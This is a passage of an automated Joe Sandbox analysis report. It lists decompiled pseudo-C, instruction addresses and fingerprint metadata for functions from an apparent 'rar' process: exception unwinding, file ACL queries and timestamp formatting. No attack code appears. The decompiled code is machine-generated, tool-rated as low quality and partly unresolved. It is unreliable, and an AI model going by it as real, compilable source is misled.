				 *((intOrPtr*)(_t189 + 0x40)) = r12d;
				 *((long long*)(_t189 + 0x38)) = _t187 - 0x80;
				 *(_t189 + 0x30) =  *(_t189 + 0x30) & 0x00000000;
				 *((long long*)(_t189 + 0x28)) = _t187 - 0x38;
				 *((long long*)(_t189 + 0x20)) = _t205;
				E00007FF67FF650B6CDF8(0, _t160 - 1, _t171, _t204,  *((intOrPtr*)(_t189 + 0x78)), _t185);
				_t197 =  *((intOrPtr*)(_t189 + 0x68));
				_t182 =  *((intOrPtr*)(_t197 + 8)) -  *((char*)(_t171 + 0x7ff650b85e20));
				 *((long long*)(_t197 + 8)) = _t182;
				 *(_t197 + 0x18) =  *(_t182 - 4) >>  *(_t171 + 0x7ff650b85e30);
				_t183 = _t182 -  *((char*)(_t171 + 0x7ff650b85e20));
				 *((long long*)(_t197 + 8)) = _t183;
				 *(_t197 + 0x1c) =  *(_t183 - 4) >>  *(_t171 + 0x7ff650b85e30);
				_t184 = _t183 -  *((char*)(_t171 + 0x7ff650b85e20));
				 *(_t197 + 0x20) =  *(_t184 - 4) >>  *(_t171 + 0x7ff650b85e30);
				 *((long long*)(_t197 + 8)) = _t184;
				 *((intOrPtr*)(_t197 + 0x24)) =  *_t184;
				_t125 =  *((intOrPtr*)(_t189 + 0x60)) + 1;
				 *((long long*)(_t197 + 8)) = _t184 + 4;
				 *((intOrPtr*)(_t189 + 0x60)) = _t125;
				if (_t125 -  *((intOrPtr*)(_t187 - 0x58)) < 0) goto 0x50b6d4f9;
				return E00007FF67FF650B69D10( *(_t184 - 4) >>  *(_t171 + 0x7ff650b85e30), _t125,  *(_t187 + 0x28) ^ _t189);
			}





























                                                                                                            0x7ff650b6d3c8
                                                                                                            0x7ff650b6d3d5
                                                                                                            0x7ff650b6d3da
                                                                                                            0x7ff650b6d3e1
                                                                                                            0x7ff650b6d3eb
                                                                                                            0x7ff650b6d3f5
                                                                                                            0x7ff650b6d3f8
                                                                                                            0x7ff650b6d3ff
                                                                                                            0x7ff650b6d402
                                                                                                            0x7ff650b6d409
                                                                                                            0x7ff650b6d40c
                                                                                                            0x7ff650b6d411
                                                                                                            0x7ff650b6d416
                                                                                                            0x7ff650b6d41c
                                                                                                            0x7ff650b6d421
                                                                                                            0x7ff650b6d428
                                                                                                            0x7ff650b6d434
                                                                                                            0x7ff650b6d438
                                                                                                            0x7ff650b6d43e
                                                                                                            0x7ff650b6d441
                                                                                                            0x7ff650b6d44a
                                                                                                            0x7ff650b6d452
                                                                                                            0x7ff650b6d45a
                                                                                                            0x7ff650b6d46c
                                                                                                            0x7ff650b6d474
                                                                                                            0x7ff650b6d479
                                                                                                            0x7ff650b6d47e
                                                                                                            0x7ff650b6d48a
                                                                                                            0x7ff650b6d49b
                                                                                                            0x7ff650b6d4a4
                                                                                                            0x7ff650b6d4aa
                                                                                                            0x7ff650b6d4b6
                                                                                                            0x7ff650b6d4bb
                                                                                                            0x7ff650b6d4c2
                                                                                                            0x7ff650b6d4c7
                                                                                                            0x7ff650b6d4cb
                                                                                                            0x7ff650b6d4d0
                                                                                                            0x7ff650b6d4d5
                                                                                                            0x7ff650b6d4dc
                                                                                                            0x7ff650b6d4ed
                                                                                                            0x7ff650b6d4f0
                                                                                                            0x7ff650b6d4f5
                                                                                                            0x7ff650b6d4f9
                                                                                                            0x7ff650b6d4fe
                                                                                                            0x7ff650b6d503
                                                                                                            0x7ff650b6d50a
                                                                                                            0x7ff650b6d514
                                                                                                            0x7ff650b6d517
                                                                                                            0x7ff650b6d52d
                                                                                                            0x7ff650b6d530
                                                                                                            0x7ff650b6d53d
                                                                                                            0x7ff650b6d541
                                                                                                            0x7ff650b6d546
                                                                                                            0x7ff650b6d551
                                                                                                            0x7ff650b6d555
                                                                                                            0x7ff650b6d55d
                                                                                                            0x7ff650b6d563
                                                                                                            0x7ff650b6d56c
                                                                                                            0x7ff650b6d56e
                                                                                                            0x7ff650b6d572
                                                                                                            0x7ff650b6d574
                                                                                                            0x7ff650b6d57d
                                                                                                            0x7ff650b6d580
                                                                                                            0x7ff650b6d584
                                                                                                            0x7ff650b6d586
                                                                                                            0x7ff650b6d592
                                                                                                            0x7ff650b6d59a
                                                                                                            0x7ff650b6d5a0
                                                                                                            0x7ff650b6d5b2
                                                                                                            0x7ff650b6d5b7
                                                                                                            0x7ff650b6d5ba
                                                                                                            0x7ff650b6d5bf
                                                                                                            0x7ff650b6d5c8
                                                                                                            0x7ff650b6d5cd
                                                                                                            0x7ff650b6d5d6
                                                                                                            0x7ff650b6d5dc
                                                                                                            0x7ff650b6d5e1
                                                                                                            0x7ff650b6d5e6
                                                                                                            0x7ff650b6d5eb
                                                                                                            0x7ff650b6d612
                                                                                                            0x7ff650b6d61a
                                                                                                            0x7ff650b6d61e
                                                                                                            0x7ff650b6d639
                                                                                                            0x7ff650b6d641
                                                                                                            0x7ff650b6d645
                                                                                                            0x7ff650b6d660
                                                                                                            0x7ff650b6d668
                                                                                                            0x7ff650b6d670
                                                                                                            0x7ff650b6d676
                                                                                                            0x7ff650b6d67e
                                                                                                            0x7ff650b6d680
                                                                                                            0x7ff650b6d684
                                                                                                            0x7ff650b6d68b
                                                                                                            0x7ff650b6d6b0

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                            • Opcode ID: e8c5e58fbd587ac278826cab787d48ea4b8bfa33ba6b163f613bd9e5619eb587
                                                                                                            • Instruction ID: 38359a453573078330037e8847837d920f2d85c83fa3c4339fe9e4533d1349b6
                                                                                                            • Opcode Fuzzy Hash: e8c5e58fbd587ac278826cab787d48ea4b8bfa33ba6b163f613bd9e5619eb587
                                                                                                            • Instruction Fuzzy Hash: 02919073E08B969AE710CB65D8802AD7BA0F705788F184129EF4EA7B55DF3DD195CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6C66C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 30%
                                                                                                            			E00007FF67FF650B6C66C(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00007FF67FF650B6E934(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x50b6c794;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x50b6c840;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x50b6c786;
				if (_t178 - _t130 >= 0) goto 0x50b6c786;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x50b6c786;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x50b6c712;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x50b6c78d;
				if (_t113 <= 0) goto 0x50b6c786;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x50b6c743;
				if ( *0x50b85e18 == 0) goto 0x50b6c743;
				if (E00007FF67FF650B7E4E0(_t130 + _t171, _t135, 0x50b85e18) == 0) goto 0x50b6c743;
				_t83 =  *0x50b85e18();
				r8d = 1;
				_t84 = E00007FF67FF650B6E900(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00007FF67FF650B6E930(_t84);
				goto 0x50b6c6c2;
				goto 0x50b6c845;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x50b6c836;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x50b6c834;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x50b6c834;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x50b6c809;
				r9d = 0;
				if (_t101 == 0) goto 0x50b6c804;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x50b6c7fc;
				if (_t156 - _t133 >= 0) goto 0x50b6c7fc;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x50b6c7fc;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x50b6c804;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x50b6c7cc;
				if (r9d != _t101) goto 0x50b6c840;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x50b6c81d;
				if (_t156 != _t133) goto 0x50b6c834;
				if (r10d != 0) goto 0x50b6c840;
				goto 0x50b6c834;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x50b6c7a0;
				return 1;
			}






























                                                                                                            0x7ff650b6c66c
                                                                                                            0x7ff650b6c66c
                                                                                                            0x7ff650b6c671
                                                                                                            0x7ff650b6c676
                                                                                                            0x7ff650b6c684
                                                                                                            0x7ff650b6c688
                                                                                                            0x7ff650b6c68b
                                                                                                            0x7ff650b6c694
                                                                                                            0x7ff650b6c697
                                                                                                            0x7ff650b6c69c
                                                                                                            0x7ff650b6c6a3
                                                                                                            0x7ff650b6c6a7
                                                                                                            0x7ff650b6c6ae
                                                                                                            0x7ff650b6c6b2
                                                                                                            0x7ff650b6c6b8
                                                                                                            0x7ff650b6c6bd
                                                                                                            0x7ff650b6c6c4
                                                                                                            0x7ff650b6c6cc
                                                                                                            0x7ff650b6c6d6
                                                                                                            0x7ff650b6c6e3
                                                                                                            0x7ff650b6c6ee
                                                                                                            0x7ff650b6c6f9
                                                                                                            0x7ff650b6c70c
                                                                                                            0x7ff650b6c70e
                                                                                                            0x7ff650b6c710
                                                                                                            0x7ff650b6c719
                                                                                                            0x7ff650b6c723
                                                                                                            0x7ff650b6c733
                                                                                                            0x7ff650b6c73d
                                                                                                            0x7ff650b6c747
                                                                                                            0x7ff650b6c753
                                                                                                            0x7ff650b6c75f
                                                                                                            0x7ff650b6c766
                                                                                                            0x7ff650b6c76d
                                                                                                            0x7ff650b6c772
                                                                                                            0x7ff650b6c776
                                                                                                            0x7ff650b6c77b
                                                                                                            0x7ff650b6c781
                                                                                                            0x7ff650b6c788
                                                                                                            0x7ff650b6c78f
                                                                                                            0x7ff650b6c798
                                                                                                            0x7ff650b6c79b
                                                                                                            0x7ff650b6c7a2
                                                                                                            0x7ff650b6c7ac
                                                                                                            0x7ff650b6c7b6
                                                                                                            0x7ff650b6c7b9
                                                                                                            0x7ff650b6c7bb
                                                                                                            0x7ff650b6c7bf
                                                                                                            0x7ff650b6c7c3
                                                                                                            0x7ff650b6c7c5
                                                                                                            0x7ff650b6c7ca
                                                                                                            0x7ff650b6c7cc
                                                                                                            0x7ff650b6c7cf
                                                                                                            0x7ff650b6c7da
                                                                                                            0x7ff650b6c7e4
                                                                                                            0x7ff650b6c7ef
                                                                                                            0x7ff650b6c7fa
                                                                                                            0x7ff650b6c7fc
                                                                                                            0x7ff650b6c802
                                                                                                            0x7ff650b6c807
                                                                                                            0x7ff650b6c80f
                                                                                                            0x7ff650b6c814
                                                                                                            0x7ff650b6c819
                                                                                                            0x7ff650b6c81b
                                                                                                            0x7ff650b6c823
                                                                                                            0x7ff650b6c827
                                                                                                            0x7ff650b6c831
                                                                                                            0x7ff650b6c83a
                                                                                                            0x7ff650b6c862

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 2395640692-629598281
                                                                                                            • Opcode ID: d90ab4726931f2e4c71a8cf38967efc22fe236ebc4aa0b45181b796d1b760db9
                                                                                                            • Instruction ID: 9b8bf9b52b45d160bfc9fde7546e0cfa36731410c50fb4db6f63e338654ba486
                                                                                                            • Opcode Fuzzy Hash: d90ab4726931f2e4c71a8cf38967efc22fe236ebc4aa0b45181b796d1b760db9
                                                                                                            • Instruction Fuzzy Hash: BA51B132A19643A6DB64CF15E484A393795FB85B88F188030DE1FA3788DF3AED41CB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2E8CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 40%
                                                                                                            			E00007FF67FF650B2E8CC(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r9, long long _a24, long long _a32, char _a40, char _a56, char _a4152, signed int _a12344, void* _a12360) {
				void* __rdi;
				void* _t38;
				void* _t40;
				signed long long _t55;
				void* _t61;
				void* _t81;
				void* _t85;
				void* _t93;
				void* _t94;

				_t82 = __rsi;
				_t40 = __ebx;
				_a24 = __rbx;
				_a32 = __rsi;
				E00007FF67FF650B69CB0(0x3050, __rax, _t93, _t94);
				_t86 = _t85 - __rax;
				_t55 =  *0x50b978f0; // 0x27db226282f1
				_a12344 = _t55 ^ _t85 - __rax;
				_t61 = __rdx;
				_t81 = __rcx;
				E00007FF67FF650B2ECE4();
				r9d = 0x2000;
				_t5 = _t82 + 8; // 0xf
				_t48 =  !=  ? _t5 : 7;
				_a24 =  &_a40;
				if (GetFileSecurityW(??, ??, ??, ??, ??) != 0) goto 0x50b2e9b6;
				r8d = 0x800;
				if (E00007FF67FF650B44664( &_a40, __rdx, __rdx,  &_a56,  &_a4152) == 0) goto 0x50b2e97a;
				r9d = 0x2000;
				_a24 =  &_a40;
				_t43 =  !=  ? _t5 : 7;
				if (GetFileSecurityW(??, ??, ??, ??, ??) != 0) goto 0x50b2e9b6;
				E00007FF67FF650B112C8(0x4f, _t81 + 0x3a, _t61);
				E00007FF67FF650B2CC94(_t40, 0x4f,  !=  ? _t5 : 7, GetFileSecurityW(??, ??, ??, ??, ??), _t61, _t81, __rsi, __rbp, _t61);
				E00007FF67FF650B2CC24(E00007FF67FF650B283F0(L"     ", _t81 + 0x3a, _t61, __r9), 1, GetFileSecurityW(??, ??, ??, ??, ??), 0x50ba7ab8);
				goto 0x50b2ea17;
				E00007FF67FF650B36990(GetSecurityDescriptorLength(??), _t81 + 0x5880, _t81 + 0x3a, _t82, _t61);
				 *((char*)(_t81 + 0x6992)) = 1;
				_t38 = E00007FF67FF650B36770(2, _t81 + 0x6900, _t81 + 0x3a);
				_a32 = 7;
				_a24 = L"ACL";
				r9d = 0;
				0x50b17ac4();
				return E00007FF67FF650B69D10(_t38, 0x4f, _a12344 ^ _t86);
			}












                                                                                                            0x7ff650b2e8cc
                                                                                                            0x7ff650b2e8cc
                                                                                                            0x7ff650b2e8cc
                                                                                                            0x7ff650b2e8d1
                                                                                                            0x7ff650b2e8dc
                                                                                                            0x7ff650b2e8e1
                                                                                                            0x7ff650b2e8e4
                                                                                                            0x7ff650b2e8ee
                                                                                                            0x7ff650b2e8f6
                                                                                                            0x7ff650b2e8f9
                                                                                                            0x7ff650b2e8fc
                                                                                                            0x7ff650b2e915
                                                                                                            0x7ff650b2e91e
                                                                                                            0x7ff650b2e921
                                                                                                            0x7ff650b2e92b
                                                                                                            0x7ff650b2e938
                                                                                                            0x7ff650b2e93a
                                                                                                            0x7ff650b2e94f
                                                                                                            0x7ff650b2e956
                                                                                                            0x7ff650b2e964
                                                                                                            0x7ff650b2e969
                                                                                                            0x7ff650b2e978
                                                                                                            0x7ff650b2e986
                                                                                                            0x7ff650b2e992
                                                                                                            0x7ff650b2e9af
                                                                                                            0x7ff650b2e9b4
                                                                                                            0x7ff650b2e9d0
                                                                                                            0x7ff650b2e9dc
                                                                                                            0x7ff650b2e9e8
                                                                                                            0x7ff650b2e9f4
                                                                                                            0x7ff650b2e9ff
                                                                                                            0x7ff650b2ea04
                                                                                                            0x7ff650b2ea12
                                                                                                            0x7ff650b2ea3b

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Security$File$DescriptorLength
                                                                                                            • String ID: $ACL
                                                                                                            • API String ID: 2361174398-1852320022
                                                                                                            • Opcode ID: a359616fdd9127ece8f2c05c087d2a53ed2c43ecab04803853a0598b4159deaa
                                                                                                            • Instruction ID: 0828054d9f73e46aa4b884391fbb4d6b7aa63d051746ac3d43620fa20ec408a9
                                                                                                            • Opcode Fuzzy Hash: a359616fdd9127ece8f2c05c087d2a53ed2c43ecab04803853a0598b4159deaa
                                                                                                            • Instruction Fuzzy Hash: B931A821B18A83A2E660DB11E8D17E963A5FF8A784F880035DA4EE3755DF3EE645C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B76C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E00007FF67FF650B5B76C(void* __ecx, void* __edx, void* __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				void* _t30;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t61;

				_t72 = __r9;
				_t49 = __rax;
				_t45 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				sil = r9b;
				_t51 = __r8;
				_t61 = __rdx;
				if ( *__rcx == 0) goto 0x50b5b80f;
				E00007FF67FF650B5B5A8(_t30,  *__rcx, __r8, __rcx,  &_v56, __rdx, __rsi);
				r9d = _v56;
				_t54 = __rdx;
				if (sil == 0) goto 0x50b5b7e5;
				_v64 = _v32;
				_v72 = _v36;
				_v80 = _v40;
				_v88 = _v44;
				_v96 = _v48;
				_v104 = _v52;
				E00007FF67FF650B1657C(_t45, _t49, __rdx, _t51, L"%u-%02u-%02u %02u:%02u:%02u,%09u", __r9);
				goto 0x50b5b81e;
				_v80 = _v40;
				_v88 = _v44;
				_v96 = _v48;
				_v104 = _v52;
				E00007FF67FF650B1657C(_t45, _t49, _t54, _t51, L"%u-%02u-%02u %02u:%02u", _t72);
				goto 0x50b5b81e;
				return E00007FF67FF650B5A390(_t61, L"????-??-?? ??:??", L"%u-%02u-%02u %02u:%02u");
			}






















                                                                                                            0x7ff650b5b76c
                                                                                                            0x7ff650b5b76c
                                                                                                            0x7ff650b5b76c
                                                                                                            0x7ff650b5b76c
                                                                                                            0x7ff650b5b771
                                                                                                            0x7ff650b5b776
                                                                                                            0x7ff650b5b78a
                                                                                                            0x7ff650b5b78d
                                                                                                            0x7ff650b5b790
                                                                                                            0x7ff650b5b793
                                                                                                            0x7ff650b5b799
                                                                                                            0x7ff650b5b79e
                                                                                                            0x7ff650b5b7a5
                                                                                                            0x7ff650b5b7ab
                                                                                                            0x7ff650b5b7b7
                                                                                                            0x7ff650b5b7be
                                                                                                            0x7ff650b5b7c5
                                                                                                            0x7ff650b5b7cc
                                                                                                            0x7ff650b5b7d3
                                                                                                            0x7ff650b5b7da
                                                                                                            0x7ff650b5b7de
                                                                                                            0x7ff650b5b7e3
                                                                                                            0x7ff650b5b7ef
                                                                                                            0x7ff650b5b7f6
                                                                                                            0x7ff650b5b7fd
                                                                                                            0x7ff650b5b804
                                                                                                            0x7ff650b5b808
                                                                                                            0x7ff650b5b80d
                                                                                                            0x7ff650b5b836

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$swprintf$LocalSystem
                                                                                                            • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                            • API String ID: 1364621626-1794493780
                                                                                                            • Opcode ID: e38d598367c776b79b252e121b611bf1193db06a467cd281701baf139a255d15
                                                                                                            • Instruction ID: bdaf8da3c3c2fff92cacfc1df633d0a5d1c67ad89334a9413d2dcf0d64537433
                                                                                                            • Opcode Fuzzy Hash: e38d598367c776b79b252e121b611bf1193db06a467cd281701baf139a255d15
                                                                                                            • Instruction Fuzzy Hash: CC21E476E186429EE750CF64E480A9D77F0F749798F584122EE49A3B18EB39E9408F10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B72724 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
